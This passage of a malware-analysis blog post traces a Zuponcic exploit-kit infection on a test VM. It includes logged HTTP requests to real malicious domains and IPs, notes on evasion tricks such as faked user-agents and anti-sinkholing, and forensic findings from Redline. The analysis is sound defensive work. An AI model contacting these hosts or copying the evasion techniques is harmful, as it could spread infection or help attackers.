<span style="font-family: "Courier New",Courier,monospace;">http://mw.prodigymsnteregala.com/ (POST)</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> Content-Type: application/x-www-form-urlencoded</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_11</span> </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> Content-Length: 90</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> i=2ZUpfq7G6Ke3q42Ny1c19p61...E78IJH3yVQJZL70k67ZEPHn9kW</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;">Response: </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> Content-Type: application/octet-stream</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">Content-Length: 957688</span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> <span style="background-color: yellow;">Content-Disposition: attachment; filename="xuqfvb"</span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> Last-Modified: Sun, 13 Jul 2014 22:01:35 GMT</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> <i>Time since request: 9.267738000 seconds</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;">http://93.115.88.220/listing/chn/all.html</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "Courier New",Courier,monospace;"> User-Agent: Mozilla/4.0 (compatible; <span style="background-color: yellow;">MSIE 7.0</span>; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="background-color: yellow;">Wrong IE version in UA!<i><span style="background-color: white;"> (looks like the rest of the UA was left unchanged, except the major version)</span></i></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial,Helvetica,sans-serif;">Detailed HTTP traffic of the Zuponcic Kit infection and initial C&C:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Request to infected website (malicious .htaccess file) coming from a Google search redirection: <i>(checks for Cookie, Referrer, User-Agent)</i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://2.bp.blogspot.com/-u8yJs3Gqeu0/U8xKt3LvpRI/AAAAAAAAAYg/UBr_t1J7xYo/s1600/Wireshark_stream-niceshop-redir-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-u8yJs3Gqeu0/U8xKt3LvpRI/AAAAAAAAAYg/UBr_t1J7xYo/s1600/Wireshark_stream-niceshop-redir-1.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Redirection to first stage Zuponcic Kit <i>(checks client IP)</i></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span> <a href="http://4.bp.blogspot.com/-aKusa0wImC8/U8xKuPMVndI/AAAAAAAAAYc/sIGLkjRWVE4/s1600/Wireshark_stream-niceshop-redir-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-aKusa0wImC8/U8xKuPMVndI/AAAAAAAAAYc/sIGLkjRWVE4/s1600/Wireshark_stream-niceshop-redir-2.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Request to main Zuponcic Kit page: </span><a href="http://4.bp.blogspot.com/-Kqf2DO6n2i8/U8xKuzQA7oI/AAAAAAAAAYo/8PFUnCgf1pI/s1600/Wireshark_stream-niceshop-redir-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-Kqf2DO6n2i8/U8xKuzQA7oI/AAAAAAAAAYo/8PFUnCgf1pI/s1600/Wireshark_stream-niceshop-redir-3.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://2.bp.blogspot.com/-Q_sFaGN8Rso/U8xKvQyx-DI/AAAAAAAAAYk/bHIG7IkjXqg/s1600/Wireshark_stream-niceshop-redir-3b.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-Q_sFaGN8Rso/U8xKvQyx-DI/AAAAAAAAAYk/bHIG7IkjXqg/s1600/Wireshark_stream-niceshop-redir-3b.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Request to "java.js" for browser (and Java) fingerprinting:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-WUxpUU4sgQk/U90K-4uOD9I/AAAAAAAAAhs/eaT8XJ0PzCc/s1600/Wireshark_stream-niceshop-java-js-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-WUxpUU4sgQk/U90K-4uOD9I/AAAAAAAAAhs/eaT8XJ0PzCc/s1600/Wireshark_stream-niceshop-java-js-1.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Malicious JAR downloader signed with stolen certificate:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-HQJoW4PilMM/U8xKs7sWfBI/AAAAAAAAAY4/dEEvQH_nNq8/s1600/Wireshark_stream-niceshop-jar-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-HQJoW4PilMM/U8xKs7sWfBI/AAAAAAAAAY4/dEEvQH_nNq8/s1600/Wireshark_stream-niceshop-jar-1.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">POST request submitting a long parameter (key?) and receiving a large binary (encrypted) file:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://2.bp.blogspot.com/-PoQpfGv-Gg8/U8xKs9k50II/AAAAAAAAAYI/24sQ_Z963b4/s1600/Wireshark_stream-niceshop-CC-post-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-PoQpfGv-Gg8/U8xKs9k50II/AAAAAAAAAYI/24sQ_Z963b4/s1600/Wireshark_stream-niceshop-CC-post-1.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">GET request to IP (computed from DNS lookup to "</span><span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-family: "Courier New",Courier,monospace;">fasternation.net</span>" -- anti-sinkholing technique) sending data as Cookie values and using faked User-Agent:</span><a href="http://4.bp.blogspot.com/-6QSpYJ1Yjow/U8xKs16MhwI/AAAAAAAAAYw/9uxtkymmG48/s1600/Wireshark_stream-niceshop-CC-get-cookie-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-6QSpYJ1Yjow/U8xKs16MhwI/AAAAAAAAAYw/9uxtkymmG48/s1600/Wireshark_stream-niceshop-CC-get-cookie-1.png" height="*" width="800" /></a></div>
<h2 class="separator" style="clear: both; text-align: left;">
</h2>
<h2 class="separator" style="clear: both; text-align: left;">
</h2>
<h2 class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span></h2>
<div class="separator" style="clear: both; text-align: left;">
</div>
<h2 class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Screenshots during VM infection</span></h2>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">During the infection the user might see some Java warnings (depending on installed Java version and settings), trying to warn him from getting infected.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://2.bp.blogspot.com/-wKTOWCVAQvw/U8b_yDfNbwI/AAAAAAAAAXM/Dp9cO4TTx0w/s1600/2014-07-14_000106_a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-wKTOWCVAQvw/U8b_yDfNbwI/AAAAAAAAAXM/Dp9cO4TTx0w/s1600/2014-07-14_000106_a.png" height="*" width="800" /></a></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://3.bp.blogspot.com/-_Gs9bdKwVSU/U8xP7l-shkI/AAAAAAAAAZI/O78e9-LGBQA/s1600/Java-Alert-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-_Gs9bdKwVSU/U8xP7l-shkI/AAAAAAAAAZI/O78e9-LGBQA/s1600/Java-Alert-2.png" height="*" width="800" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://4.bp.blogspot.com/-xZTHEygUylw/U8xP7pPsF7I/AAAAAAAAAZE/juA2CKs1aL0/s1600/OnUnload-Alert-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-xZTHEygUylw/U8xP7pPsF7I/AAAAAAAAAZE/juA2CKs1aL0/s1600/OnUnload-Alert-1.png" height="*" width="800" /></a></div>
<div style="text-align: left;">
<br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Using ProcessHacker the malware process shows like this:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-cIz4kvwzBDg/U9mAIk14oSI/AAAAAAAAAgA/b6AEf7Slve0/s1600/ProcessHacker_rnd-mal-exe-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-cIz4kvwzBDg/U9mAIk14oSI/AAAAAAAAAgA/b6AEf7Slve0/s1600/ProcessHacker_rnd-mal-exe-1.png" height="*" width="800" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"></span>
<span style="font-family: Arial,Helvetica,sans-serif;"></span>
<br />
<h2>
<span style="font-family: Arial,Helvetica,sans-serif;">Running Redline Collector</span></h2>
<span style="font-family: Arial,Helvetica,sans-serif;"></span>
<span style="font-family: Arial,Helvetica,sans-serif;">The recommended way for running Redline Collector on a host is via USB key. However, if you're not concerned about modification of the host under investigation you can also run Redline Collector remotely by copying it over the network or running it from a mounted share.</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;">I may write more details about how to run Redline Collector remotely over the net in a later blog post. In this post I'd like to focus on the details available from a Redline analysis.</span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Here is a list of modules and options selected for this collection:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-SgSRaCFlpHw/U90MgB8vhOI/AAAAAAAAAh4/dHsjrMZnxXk/s1600/Redline_analysis-data-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-SgSRaCFlpHw/U90MgB8vhOI/AAAAAAAAAh4/dHsjrMZnxXk/s1600/Redline_analysis-data-1.png" /></a></div>
<br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">The XML files created during collection can get pretty large, depending on which modules are executed and settings in the script. The registry, event logs and filesystem make the largest part of this collection. However, the 537 MB of raw data nicely compress into a much smaller 33 MB. Compare this to a hard drive image or a memory dump. </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-Sn30PY7HEzQ/U9vSgbMfdGI/AAAAAAAAAhc/3DDH7ehFPDw/s1600/Redline_collection-files-CMD-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-Sn30PY7HEzQ/U9vSgbMfdGI/AAAAAAAAAhc/3DDH7ehFPDw/s1600/Redline_collection-files-CMD-1.png" /></a></div>
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-23FEE0acgHk/U9mNCZzwkKI/AAAAAAAAAg0/cvxHXE34E0I/s1600/Redline_collection-files-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-23FEE0acgHk/U9mNCZzwkKI/AAAAAAAAAg0/cvxHXE34E0I/s1600/Redline_collection-files-3.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-41J-T9kkKPs/U9mNCmU0i9I/AAAAAAAAAg4/C48IFKSlUDk/s1600/Redline_collection-files-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-41J-T9kkKPs/U9mNCmU0i9I/AAAAAAAAAg4/C48IFKSlUDk/s1600/Redline_collection-files-2.png" /></a></div>
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"></span>
<span style="font-family: Arial,Helvetica,sans-serif;"></span>
<br />
<h2>
<span style="font-family: Arial,Helvetica,sans-serif;">Analysis using Redline</span></h2>
</div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">After running Redline Collector on a suspicious or infected host you get lots of data (in XML format) to analyze with Redline, but also using grep and some other bash-fu (on Linux or Cygwin) can be very useful.</span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Using the timeline function from Redline is very easy and powerful. It lines up any artifacts collected using several timestamps that are selectable.</span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-6z8eaIKtP18/U90NJAyAUjI/AAAAAAAAAiA/cCLG7ScU7ik/s1600/Redline_timeline-config-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-6z8eaIKtP18/U90NJAyAUjI/AAAAAAAAAiA/cCLG7ScU7ik/s1600/Redline_timeline-config-1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-YsSTCZ_vCfo/U90NJAPUHHI/AAAAAAAAAiE/esorvAqd7Pw/s1600/Redline_timeline-config-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-YsSTCZ_vCfo/U90NJAPUHHI/AAAAAAAAAiE/esorvAqd7Pw/s1600/Redline_timeline-config-2.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Here are some artifacts from the timeline of this infection.</span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Google redirection URL</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://3.bp.blogspot.com/-RuiPbK0sXPw/U8xSOPC48uI/AAAAAAAAAZo/V5hQbXwE1gU/s1600/Redline_google-redir-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-RuiPbK0sXPw/U8xSOPC48uI/AAAAAAAAAZo/V5hQbXwE1gU/s1600/Redline_google-redir-1.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-P5hKKZoe25w/U9gR2l9Cd_I/AAAAAAAAAdc/_Dlc7NSCc3E/s1600/Redline_google-redir-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-P5hKKZoe25w/U9gR2l9Cd_I/AAAAAAAAAdc/_Dlc7NSCc3E/s1600/Redline_google-redir-1a.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">A cookie is set from the infected web server the mark the first visit:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://3.bp.blogspot.com/-zTAwSrm-fmY/U8xSO8nTIOI/AAAAAAAAAaA/GHTo2oxrOeA/s1600/Redline_niceshop-cookie.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-zTAwSrm-fmY/U8xSO8nTIOI/AAAAAAAAAaA/GHTo2oxrOeA/s1600/Redline_niceshop-cookie.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-H5RyKI-kG60/U9gR2vpqlbI/AAAAAAAAAdY/rJYiBXHj0f8/s1600/Redline_niceshop-cookie-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-H5RyKI-kG60/U9gR2vpqlbI/AAAAAAAAAdY/rJYiBXHj0f8/s1600/Redline_niceshop-cookie-1a.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">First request to Zuponcic Kit domain:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://2.bp.blogspot.com/-9fbqmcXjoEE/U8xSOWSumQI/AAAAAAAAAZs/2IaYbSnHH0I/s1600/Redline_mal-domain-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-9fbqmcXjoEE/U8xSOWSumQI/AAAAAAAAAZs/2IaYbSnHH0I/s1600/Redline_mal-domain-1.png" height="*" width="800" /></a></div>
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-qLKWA9zerl8/U9gR2tRo23I/AAAAAAAAAdg/3BXJ0a7CgnQ/s1600/Redline_mal-domain-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-qLKWA9zerl8/U9gR2tRo23I/AAAAAAAAAdg/3BXJ0a7CgnQ/s1600/Redline_mal-domain-1a.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Request to "java.js" for loading the Java applet:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://1.bp.blogspot.com/-wGlrMkcwYjk/U8xU5v9fPAI/AAAAAAAAAb0/bz8p_kEl37k/s1600/Redline_mal-domain-java-js-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-wGlrMkcwYjk/U8xU5v9fPAI/AAAAAAAAAb0/bz8p_kEl37k/s1600/Redline_mal-domain-java-js-1.png" height="*" width="800" /></a></div>
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-ien1nfhjrIw/U9gSxI9wprI/AAAAAAAAAdw/GA-89hpEYUA/s1600/Redline_mal-domain-java-js-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-ien1nfhjrIw/U9gSxI9wprI/AAAAAAAAAdw/GA-89hpEYUA/s1600/Redline_mal-domain-java-js-1a.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Prefetch file for "java.exe" created or updated:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"></span><a href="http://1.bp.blogspot.com/-qBaW3Tpw4NU/U8xSNxgb0xI/AAAAAAAAAbA/ungV7fB68ak/s1600/Redline_file-prefetch-java-exe-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-qBaW3Tpw4NU/U8xSNxgb0xI/AAAAAAAAAbA/ungV7fB68ak/s1600/Redline_file-prefetch-java-exe-2.png" height="*" width="800" /></a></div>
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-0sMPx_PTwTg/U9gTAqp5PpI/AAAAAAAAAd4/RqDitq_fieg/s1600/Redline_prefetch-java-exe-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-0sMPx_PTwTg/U9gTAqp5PpI/AAAAAAAAAd4/RqDitq_fieg/s1600/Redline_prefetch-java-exe-1a.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">Registry key created / updated for Malware domain serving malicious JAR:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-j2Y3bv-BPjc/U9gXDeFBMqI/AAAAAAAAAeo/Gxd_qM9HDWM/s1600/Redline_registry-java-allowed-mal-domain-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-j2Y3bv-BPjc/U9gXDeFBMqI/AAAAAAAAAeo/Gxd_qM9HDWM/s1600/Redline_registry-java-allowed-mal-domain-1.png" height="*" width="800" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-IB2qjgPtR8k/U9gXDWZUP5I/AAAAAAAAAes/IQAEsBhj1qg/s1600/Redline_registry-java-allowed-mal-domain-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-IB2qjgPtR8k/U9gXDWZUP5I/AAAAAAAAAes/IQAEsBhj1qg/s1600/Redline_registry-java-allowed-mal-domain-1a.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"></span>
<span style="font-family: Arial,Helvetica,sans-serif;"></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">Prefetch file for malware TMP file dropped:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-_MjvINjQtnk/U9gQsr8KVII/AAAAAAAAAcw/W5CjxLKl30I/s1600/Redline_prefetch-mal-exe-tmp-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-_MjvINjQtnk/U9gQsr8KVII/AAAAAAAAAcw/W5CjxLKl30I/s1600/Redline_prefetch-mal-exe-tmp-1.png" height="*" width="800" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-UO3JABorY3A/U9gQsuhwlRI/AAAAAAAAAcs/XSImqrIPoFQ/s1600/Redline_prefetch-mal-exe-tmp-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-UO3JABorY3A/U9gQsuhwlRI/AAAAAAAAAcs/XSImqrIPoFQ/s1600/Redline_prefetch-mal-exe-tmp-1a.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-9oenX18nUp4/U9gQtXb0LhI/AAAAAAAAAc8/bfkSYMeiQC0/s1600/Redline_prefetch-mal-exe-tmp-2a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-9oenX18nUp4/U9gQtXb0LhI/AAAAAAAAAc8/bfkSYMeiQC0/s1600/Redline_prefetch-mal-exe-tmp-2a.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"></span>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Arial,Helvetica,sans-serif;">Malware EXE file created:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-jOHgpAox2JI/U9gQsttgv_I/AAAAAAAAAc0/ut4hma9DGOI/s1600/Redline_file-create-mal-exe.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-jOHgpAox2JI/U9gQsttgv_I/AAAAAAAAAc0/ut4hma9DGOI/s1600/Redline_file-create-mal-exe.png" height="*" width="800" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-x1ZT7zcK1Os/U9gkdt8GTmI/AAAAAAAAAfU/upMLg-KKXz4/s1600/Redline_file-create-mal-exe-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-x1ZT7zcK1Os/U9gkdt8GTmI/AAAAAAAAAfU/upMLg-KKXz4/s1600/Redline_file-create-mal-exe-1a.png" /></a></div>
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">Malware EXE process started:</span></div>
<div style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-KsW5aD1VNao/U9gWPmv-duI/AAAAAAAAAec/DmMioc1xpRQ/s1600/Redline_process-start-mal-exe-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-KsW5aD1VNao/U9gWPmv-duI/AAAAAAAAAec/DmMioc1xpRQ/s1600/Redline_process-start-mal-exe-1.png" height="*" width="800" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/--KsYRxiF-f8/U9gWPkYniFI/AAAAAAAAAeY/F1ENy32gQMw/s1600/Redline_process-start-mal-exe-1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/--KsYRxiF-f8/U9gWPkYniFI/AAAAAAAAAeY/F1ENy32gQMw/s1600/Redline_process-start-mal-exe-1a.png" /></a></div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
